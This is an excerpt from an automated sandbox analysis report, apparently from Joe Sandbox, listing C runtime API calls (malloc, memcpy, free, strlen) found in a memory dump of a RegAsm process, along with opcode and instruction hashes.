                                                                                                                                    • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                  • free.MSVCRT ref: 0040B224
                                                                                                                                  • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: free$memcpy$mallocwcslen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 726966127-0
                                                                                                                                  • Opcode ID: 3fbb0c8c7c7e4ea4d8d3f9a957d1a1ca0f5bc9a66927b7414586bca7b56f5ab2
                                                                                                                                  • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                                  • Opcode Fuzzy Hash: 3fbb0c8c7c7e4ea4d8d3f9a957d1a1ca0f5bc9a66927b7414586bca7b56f5ab2
                                                                                                                                  • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                                  APIs
                                                                                                                                  • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                  • free.MSVCRT ref: 0040B0FB
                                                                                                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                    • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                    • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                  • free.MSVCRT ref: 0040B12C
                                                                                                                                  • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: free$memcpy$mallocstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3669619086-0
                                                                                                                                  • Opcode ID: 8a001e82ca3730f1e98eedeca7a3bb7ead531333626601bff92a244b64e8cf14
                                                                                                                                  • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                                  • Opcode Fuzzy Hash: 8a001e82ca3730f1e98eedeca7a3bb7ead531333626601bff92a244b64e8cf14
                                                                                                                                  • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ??2@
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1033339047-0
                                                                                                                                  • Opcode ID: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                                                                                                                                  • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                  • Opcode Fuzzy Hash: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                                                                                                                                  • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49